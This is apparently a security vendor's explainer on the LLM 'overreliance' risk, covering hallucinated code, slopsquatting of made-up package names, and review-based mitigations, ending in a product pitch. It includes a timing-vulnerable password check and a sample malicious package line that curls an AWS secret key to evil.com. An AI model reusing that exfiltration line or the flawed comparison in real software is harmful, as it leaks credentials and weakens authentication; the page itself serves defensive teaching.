LLM09: Overreliance

Verified by Precogs Threat Research

LLM09:2025MEDIUMCWE-20 CWE-345 CWE-1104

Overreliance occurs when developers and users blindly trust LLM-generated output without validation — accepting AI-generated code, security assessments, or factual claims without review. LLMs hallucinate with confidence, generate plausible-looking but vulnerable code, and cite non-existent sources. When AI-generated content is deployed without verification, it introduces bugs, security vulnerabilities, and misinformation into production systems.

The Hallucination Problem

LLMs generate plausible text, not verified truth. Studies show GPT-4 hallucination rates range from 3-10% depending on the domain. In code generation, this manifests as functions that look correct but have subtle logic errors, security vulnerabilities, or use non-existent APIs. Developers who have seen the AI produce correct code 90% of the time may stop reviewing it carefully — and that's when the dangerous 10% slips through.

AI-Generated Vulnerabilities

Research from Stanford (2023) showed that developers using AI code assistants produced significantly more security vulnerabilities than those coding without AI help — and were more confident their code was secure. The AI confidently generates code with SQL injection, XSS, path traversal, and missing authentication, and developers trust it because it came from "the AI."

Package Hallucination

LLMs frequently suggest importing packages that don't exist. Attackers exploit this by creating malicious packages with hallucinated names (a technique called "slopsquatting"). When a developer follows the AI's suggestion and runs npm install hallucinated-package, they install malware. This has been observed with npm, PyPI, and Maven packages.

Attack Examples & Code Patterns

Vulnerable AI-generated authentication code

Code that looks correct but has a critical timing attack vulnerability:

// AI-generated code that a developer might accept without review
// ❌ VULNERABLE — timing attack on password comparison
function verifyPassword(input: string, stored: string): boolean {
  if (input.length !== stored.length) return false;
  for (let i = 0; i < input.length; i++) {
    if (input[i] !== stored[i]) return false;  // Early return leaks info
  }
  return true;
}

// ✅ SAFE — constant-time comparison
import { timingSafeEqual } from 'crypto';
function verifyPasswordSafe(input: string, stored: string): boolean {
  const a = Buffer.from(input);
  const b = Buffer.from(stored);
  if (a.length !== b.length) return false;
  return timingSafeEqual(a, b);  // No timing side channel
}

Slopsquatting — hallucinated package attack

AI suggests a non-existent package that an attacker has registered:

# AI suggests: "Install the flask-auth-helper package"
# pip install flask-auth-helper

# This package doesn't exist — the AI hallucinated it.
# An attacker registers "flask-auth-helper" on PyPI with:
import os
os.system("curl http://evil.com/steal?key=" + 
    os.environ.get("AWS_SECRET_ACCESS_KEY", ""))

# The developer installs malware thinking it's a real package.
# ✅ MITIGATION: Always verify packages exist on official repos
# before installing. Check download counts and maintainer history.

Detection Checklist

Require code review for all AI-generated code before merge
Run security-focused CI/CD scans on every commit (Precogs AI)
Cross-reference AI-suggested packages against official registries
Test AI-generated functions with adversarial inputs
Track which code was AI-generated vs human-written for audit
Educate developers about common AI code generation pitfalls

Mitigation Strategy

Implement mandatory code review for AI-generated code. Use automated testing (unit, integration, security) to validate LLM output. Cross-reference AI-generated facts with authoritative sources. Set up CI/CD gates that block deployment of unreviewed AI code. Educate teams about LLM hallucination rates.

Why is overreliance on AI-generated code dangerous?

LLMs hallucinate with confidence — generating plausible but vulnerable code, suggesting non-existent packages, and producing incorrect security logic. Stanford research showed developers using AI assistants produced more vulnerabilities while feeling more confident. Prevention requires automated security scanning, mandatory code review, and package verification.

Protect Against LLM09: Overreliance

Precogs AI automatically detects llm09: overreliance vulnerabilities and generates AutoFix PRs.

Start Free Scan Book a demo